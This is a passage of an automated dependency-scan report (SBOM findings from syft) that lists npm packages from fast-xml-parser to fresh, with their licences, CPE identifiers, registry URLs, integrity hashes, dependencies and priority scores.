source: nvd-cpe-dictionary
purl: pkg:npm/fast-xml-parser@5.7.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-5.7.2.tgz
integrity: sha512-P7oW7tLbYnhOLQk/Gv7cZgzgMPP/XN03K02/Jy6Y/NHzyIAIpxuZIM/YqAkfiXFPxA2CTm7NtCijK9EDu09u2w==
dependencies:
'@nodable/entities': ^2.1.0
fast-xml-builder: ^1.1.5
path-expression-matcher: ^1.5.0
strnum: ^2.2.3
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 0cdc7a6cc314eb50
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: fastq 1.20.1'
title: fastq 1.20.1
description: 'Package discovered: fastq 1.20.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 32597e8bd5ad1e0f
name: fastq
version: 1.20.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:fastq:fastq:1.20.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/fastq@1.20.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/fastq/-/fastq-1.20.1.tgz
integrity: sha512-GGToxJ/w1x32s/D2EKND7kTil4n8OVk/9mycTc4VDza13lOvpUZTGX3mFSCtV9ksdGBVzvsyAVLM6mHFThxXxw==
dependencies:
reusify: ^1.0.4
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 98eadb7c6959fda9
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: faye-websocket 0.11.4'
title: faye-websocket 0.11.4
description: 'Package discovered: faye-websocket 0.11.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 5a9d4671ef023c43
name: faye-websocket
version: 0.11.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:faye-websocket:faye-websocket:0.11.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:faye-websocket:faye_websocket:0.11.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:faye_websocket:faye-websocket:0.11.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:faye_websocket:faye_websocket:0.11.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:faye:faye-websocket:0.11.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:faye:faye_websocket:0.11.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/faye-websocket@0.11.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/faye-websocket/-/faye-websocket-0.11.4.tgz
integrity: sha512-CzbClwlXAuiRQAlUyfqPgvPoNKTckTPGfwZV4ZdAhVcP2lh9KUxJg2b5GkE7XbjKQ3YJnQ9z6D9ntLAlB+tP8g==
dependencies:
websocket-driver: '>=0.5.1'
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 64d0cebc4ed83cee
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: fdir 6.5.0'
title: fdir 6.5.0
description: 'Package discovered: fdir 6.5.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 4d9064c107e69a4e
name: fdir
version: 6.5.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:fdir:fdir:6.5.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/fdir@6.5.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/fdir/-/fdir-6.5.0.tgz
integrity: sha512-tIbYtZbucOs0BRGqPJkshJUYdL+SDH7dVM8gjy+ERp3WAUjLEFJE+02kanyHtwjWOnwrKYBiwAmM0p4kLJAnXg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7b56dfc5637424f2
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: fflate 0.8.2'
title: fflate 0.8.2
description: 'Package discovered: fflate 0.8.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ad8b63b86fd3ee37
name: fflate
version: 0.8.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:fflate:fflate:0.8.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/fflate@0.8.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/fflate/-/fflate-0.8.2.tgz
integrity: sha512-cPJU47OaAoCbg0pBvzsgpTPhmhqI5eJjh/JIu8tPj5q+T7iLvW/JAYUqmE7KOB4R1ZyEhzBaIQpQpardBF5z8A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d2d1a258c47b4e8a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: fill-range 7.1.1'
title: fill-range 7.1.1
description: 'Package discovered: fill-range 7.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: adf22420cd3811ab
name: fill-range
version: 7.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:fill-range:fill-range:7.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fill-range:fill_range:7.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fill_range:fill-range:7.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fill_range:fill_range:7.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fill:fill-range:7.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:fill:fill_range:7.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/fill-range@7.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz
integrity: sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==
dependencies:
to-regex-range: ^5.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 0d132a7f95881c19
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: finalhandler 1.3.2'
title: finalhandler 1.3.2
description: 'Package discovered: finalhandler 1.3.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 257d2278606af57b
name: finalhandler
version: 1.3.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:finalhandler:finalhandler:1.3.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/finalhandler@1.3.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/finalhandler/-/finalhandler-1.3.2.tgz
integrity: sha512-aA4RyPcd3badbdABGDuTXCMTtOneUCAYH/gxoYRTZlIJdF0YPWuGqiAsIrhNnnqdXGswYk6dGujem4w80UJFhg==
dependencies:
debug: 2.6.9
encodeurl: ~2.0.0
escape-html: ~1.0.3
on-finished: ~2.4.1
parseurl: ~1.3.3
statuses: ~2.0.2
unpipe: ~1.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a37c455231ce6925
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: find-up 4.1.0'
title: find-up 4.1.0
description: 'Package discovered: find-up 4.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: dde504db4cea8c91
name: find-up
version: 4.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:find-up:find-up:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:find-up:find_up:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:find_up:find-up:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:find_up:find_up:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:find:find-up:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:find:find_up:4.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/find-up@4.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz
integrity: sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==
dependencies:
locate-path: ^5.0.0
path-exists: ^4.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 6285de3b3f3c2477
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: firebase-admin 12.7.0'
title: firebase-admin 12.7.0
description: 'Package discovered: firebase-admin 12.7.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 01aea657af389bb4
name: firebase-admin
version: 12.7.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:firebase-admin:firebase-admin:12.7.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:firebase-admin:firebase_admin:12.7.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:firebase_admin:firebase-admin:12.7.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:firebase_admin:firebase_admin:12.7.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:firebase:firebase-admin:12.7.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:firebase:firebase_admin:12.7.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/firebase-admin@12.7.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/firebase-admin/-/firebase-admin-12.7.0.tgz
integrity: sha512-raFIrOyTqREbyXsNkSHyciQLfv8AUZazehPaQS1lZBSCDYW74FYXU0nQZa3qHI4K+hawohlDbywZ4+qce9YNxA==
dependencies:
'@fastify/busboy': ^3.0.0
'@firebase/database-compat': 1.0.8
'@firebase/database-types': 1.0.5
'@types/node': ^22.0.1
farmhash-modern: ^1.1.0
jsonwebtoken: ^9.0.0
jwks-rsa: ^3.1.0
node-forge: ^1.3.1
uuid: ^10.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a972164b3d990123
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: follow-redirects 1.16.0'
title: follow-redirects 1.16.0
description: 'Package discovered: follow-redirects 1.16.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a8847fd98501e6bd
name: follow-redirects
version: 1.16.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:follow-redirects:follow_redirects:1.16.0:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/follow-redirects@1.16.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.16.0.tgz
integrity: sha512-y5rN/uOsadFT/JfYwhxRS5R7Qce+g3zG97+JrtFZlC9klX/W5hD7iiLzScI4nZqUS7DNUdhPgw4xI8W2LuXlUw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a2e20f1dd4ff167a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: fontkit 2.0.4'
title: fontkit 2.0.4
description: 'Package discovered: fontkit 2.0.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 83c2ace663a40ea8
name: fontkit
version: 2.0.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:fontkit:fontkit:2.0.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/fontkit@2.0.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/fontkit/-/fontkit-2.0.4.tgz
integrity: sha512-syetQadaUEDNdxdugga9CpEYVaQIxOwk7GlwZWWZ19//qW4zE5bknOKeMBDYAASwnpaSHKJITRLMF9m1fp3s6g==
dependencies:
'@swc/helpers': ^0.5.12
brotli: ^1.3.2
clone: ^2.1.2
dfa: ^1.2.0
fast-deep-equal: ^3.1.3
restructure: ^3.0.0
tiny-inflate: ^1.0.3
unicode-properties: ^1.4.0
unicode-trie: ^2.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 0277ddadc8ca9fad
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: foreground-child 3.3.1'
title: foreground-child 3.3.1
description: 'Package discovered: foreground-child 3.3.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: be5a9ebbd8259fbe
name: foreground-child
version: 3.3.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:foreground-child:foreground-child:3.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:foreground-child:foreground_child:3.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:foreground_child:foreground-child:3.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:foreground_child:foreground_child:3.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:foreground:foreground-child:3.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:foreground:foreground_child:3.3.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/foreground-child@3.3.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.1.tgz
integrity: sha512-gIXjKqtFuWEgzFRJA9WCQeSJLZDjgJUOMCMzxtvFq/37KojM1BFGufqsCy0r4qSQmYLsZYMeyRqzIWOMup03sw==
dependencies:
cross-spawn: ^7.0.6
signal-exit: ^4.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f31639275e9af4b4
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: form-data 2.5.5'
title: form-data 2.5.5
description: 'Package discovered: form-data 2.5.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: cccf1222c38fa883
name: form-data
version: 2.5.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:form-data:form-data:2.5.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:form-data:form_data:2.5.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:form_data:form-data:2.5.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:form_data:form_data:2.5.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:form:form-data:2.5.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:form:form_data:2.5.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/form-data@2.5.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/form-data/-/form-data-2.5.5.tgz
integrity: sha512-jqdObeR2rxZZbPSGL+3VckHMYtu+f9//KXBsVny6JSX/pa38Fy+bGjuG8eW/H6USNQWhLi8Num++cU2yOCNz4A==
dependencies:
asynckit: ^0.4.0
combined-stream: ^1.0.8
es-set-tostringtag: ^2.1.0
hasown: ^2.0.2
mime-types: ^2.1.35
safe-buffer: ^5.2.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f04370c9bd4302d0
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: form-data 4.0.5'
title: form-data 4.0.5
description: 'Package discovered: form-data 4.0.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: fb8802f2379acb63
name: form-data
version: 4.0.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:form-data:form-data:4.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:form-data:form_data:4.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:form_data:form-data:4.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:form_data:form_data:4.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:form:form-data:4.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:form:form_data:4.0.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/form-data@4.0.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/form-data/-/form-data-4.0.5.tgz
integrity: sha512-8RipRLol37bNs2bhoV67fiTEvdTrbMUYcFTiy3+wuuOnUog2QBHCZWXDRijWQfAkhBj2Uf5UnVaiWwA5vdd82w==
dependencies:
asynckit: ^0.4.0
combined-stream: ^1.0.8
es-set-tostringtag: ^2.1.0
hasown: ^2.0.2
mime-types: ^2.1.12
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 309869a00f00319d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: forwarded 0.2.0'
title: forwarded 0.2.0
description: 'Package discovered: forwarded 0.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e972502f7a8ea944
name: forwarded
version: 0.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:forwarded_project:forwarded:0.2.0:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/forwarded@0.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/forwarded/-/forwarded-0.2.0.tgz
integrity: sha512-buRG0fpBtRHSTCOASe6hD258tEubFoRLb4ZNA6NxMVHNw2gOcwHo9wyablzMzOA5z9xA9L1KNjk/Nt6MT9aYow==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f433c70fa1fc6314
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: fraction.js 5.3.4'
title: fraction.js 5.3.4
description: 'Package discovered: fraction.js 5.3.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f45608cb782e3ae1
name: fraction.js
version: 5.3.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:fraction.js:fraction.js:5.3.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/fraction.js@5.3.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/fraction.js/-/fraction.js-5.3.4.tgz
integrity: sha512-1X1NTtiJphryn/uLQz3whtY6jK3fTqoE3ohKs0tT+Ujr1W59oopxmoEh7Lu5p6vBaPbgoM0bzveAW4Qi5RyWDQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9a535c2456d85e31
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: fresh 0.5.2'
title: fresh 0.5.2
description: 'Package discovered: fresh 0.5.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 7908a3419570e85d
name: fresh
version: 0.5.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:fresh_project:fresh:0.5.2:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/fresh@0.5.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/fresh/-/fresh-0.5.2.tgz
integrity: sha512-zJ2mQYM18rEFOudeV4GShTGIQ7RbzA7ozbU9I/XBpm7kqgMywgmylMwXHxZJmkVoYkna9d2pVXVXPdYTP9ej8Q==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
